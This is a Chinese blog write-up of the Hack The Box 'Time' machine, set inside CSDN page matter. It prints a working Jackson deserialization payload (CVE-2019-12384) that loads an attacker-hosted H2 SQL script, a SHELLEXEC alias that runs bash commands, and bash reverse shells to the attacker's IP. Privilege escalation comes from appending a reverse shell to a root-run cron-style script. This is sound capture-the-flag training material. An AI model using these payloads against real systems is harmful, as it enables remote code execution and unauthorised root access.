【Hack The Box】linux练习-- time

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量1k 收藏
点赞数 1
分类专栏: Hack The Box 文章标签: linux java 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127999278
版权

HTB 学习笔记

【Hack The Box】linux练习-- time

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月24日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Online JSON parser
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

在这里插入图片描述
是一个js美化的
只有一个框可以输入js代码
在这里插入图片描述
也就只是给你改成次行风格

另一种模式尝试一下
发现报错了

在这里插入图片描述

alidation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

所以后端使用 Java 来验证 JSON,特别是Jackson

Jackson CVE-2019-12384

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.29/test.sql'"}]

这是利用了 JSON 反序列化漏洞。 在这个概念验证中,他们使用的是 H2 数据库驱动程序(在大多数使用数据库的 Java 部署中应该存在,这是最多的)。 该驱动程序可以运行一个 SQL 脚本,该脚本通常用于支持数据库迁移。

在这里插入图片描述
确实有效
接下来就要只做一个恶意sql文件

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('ping -c 1 10.10.14.29')

在这里插入图片描述
接收到了ping

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"')

在这里插入图片描述

shell->root

下一步就是提权了,我将上传linpeas.sh并且还有pxpy,来分析进程以及一些二进制文件
在这里插入图片描述
/usr/bin/timer_backup.sh
/tmp/hsperfdata_pericles/5951

该计时器上次运行是在四秒前,将在五秒后再次运行。 在 HTB 机器上,任何少于五分钟的计时器都值得一看。
在这里插入图片描述看到存在一个计划任务
我将寻找一下这个文件在哪里

find /etc/systemd/ -name timer_backup.service
得到结果
/etc/systemd/system/timer_backup.service
查看一下
cat /etc/systemd/system/timer_backup.service

[Unit]
Description=Calls website backup
Wants=timer_backup.timer
WantedBy=multi-user.target

[Service]
ExecStart=/usr/bin/systemctl restart web_backup.service

它只是重新启动另一个服务, web_backup.service

在这里插入图片描述
并且是root运行

寻找一下他重启的服务

find /etc/systemd/ -name web_backup.service
在这里插入图片描述也是root运行

查看一下

[Unit]
Description=Creates backups of the website

[Service]
ExecStart=/bin/bash /usr/bin/timer_backup.sh

他调用了/usr/bin/timer_backup.sh

在这里插入图片描述这个脚本对我们是可写的
那就没啥说的了

echo -e '\nbash -i >& /dev/tcp/10.10.14.8/443 0>&1' >> /usr/bin/timer_backup.sh

两个>>添加到最后一行在这里插入图片描述

人间体佐菲
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证!...
HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作
03-20
【标题】"HackTheBox-Writes-Ups:HackTheBox CTFC挑战写作"涉及的是一个网络安全领域的活动,其中“HackTheBox”是一个知名的在线平台,它提供了模拟黑客攻击的环境来提升安全专业人员的技能。CTF(Capture The Flag...
HackTheBox::Time
aya3t的博客
10-24 328
HackTheBox::Time
hackthebox 我的第一次
Ms08067安全实验室
12-23 1055
本文作者:time(Ms08067内网安全小组成员)time微信(欢迎骚扰交流):这是我第一次玩 hackthebox,就找个尽量简单点的,拿到ip先简单扫一扫那肯定只有80开始点击一看...
Timer简易使用
github_35666460的博客
07-22 356
Timer是一种线程设施,用于安排以后在后台线程中执行的任务。可安排任务执行一次,或者定期重复执行,可以看成一个定时器,可以调度TimerTask。 TimerTask是一个抽象类,实现了Runnable接口,所以具备了多线程的能力。 Timer使用方法: Timer timer = new Timer(true);//声明 timer.schedule(timerTask, 0,
HTB-Time
TA不懒,但还没有添加简介
04-23 362
HTB-Time
通过tmate 来 SSH 连接到 GitHub Actions
whojoe的博客
06-23 802
通过tmate 来 SSH 连接到 GitHub Actions步骤注意参考文章 步骤 https://github.com/csexton/debugger-action fork到自己的仓库 进入actions创建工作流 修改配置文件 name: Ubuntu on: [push] jobs: Ubuntu: runs-on: ubuntu-latest steps: - name: Setup Debug Session uses: csexton/debug
Hack The Boxlinux练习-- Nineveh
人间体佐菲的博客
11-09 829
Hack The Boxlinux练习-- Nineveh
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
在这个领域,两个知名的在线平台是Hackthebox和Vulnhub,它们提供虚拟环境供用户实践和提升渗透测试技能。这份PDF文档作者Joas Antonio分享了一些初学者在接触这些平台时可能会发现有用的技巧和策略。 首先,对于...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
github2telegram:Github的电报机器人
04-01
github2电报 Github的电报机器人
telegram-bot-github:允许您直接在Telegram中接收GitHub通知
02-01
电报机器人github 该项目不再受支持,功能请求将不再实现。 但是,它可以如README中所述正常工作。 Telegram机器人,当您在GitHub上收到新通知时会通知您。 它使用GitHub端点/notifications ,通过间隔时间间隔监视所有更改。 没有过滤\排序之类的东西,它只是合并端点,如果发生新的事情,则将其发送给Telegram。 如果您想“过滤”一些通知,只需停止查看GitHub上的存储库,这样GitHub将停止发送通知。 您可以将此机器人添加到您的联系人列表中。 执照 MIT许可证(MIT) 版权所有(c)2015-2020 Eugene Obrezkov 特此免费授予获得该软件和相关文档文件(“软件”)副本的任何人无限制使用软件的权利,包括但不限于使用,复制,修改,合并的权利,发布,分发,再许可和/或出售本软件的副本,并允许具备软件的人员这样做,但须满足以下条件: 以上版权声明和本许可声明应包含在本软件的所有副本或大部分内容中。 该软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
Hack The Box -----------------------Active
大方子
12-16 6925
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
HackTheBox注册&misc签到
抒情诗
03-17 607
太菜了,做点游戏玩玩吧 邀请码获得 进入首页,在console控制台输入 makeInviteCode() 得到一串base64 data: "SW4gb3JkZXIgdG8gZ2VuZXJhdGUgdGhlIGludml0ZSBjb2RlLCBtYWtlIGEgUE9TVCByZXF1ZXN0IHRvIC9hcGkvaW52aXRlL2dlbmVyYXRl" enctype: "BASE64" 把base64解一下码得 In order to generate the invite code, mak
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 1076
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
60个常见的 Linux 指令
yatingliu的博客
07-25 2175
常见 60 个Linux指令学习笔记
Linux 常用命令 - cp 【复制文件和目录】
随便转转
07-24 1344
cp 命令来源于英文单词 “copy”,用于复制文件和目录。它是 Linux 系统中最常用的文件管理命令之一,可以将文件或目录从一个位置复制到另一个位置。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值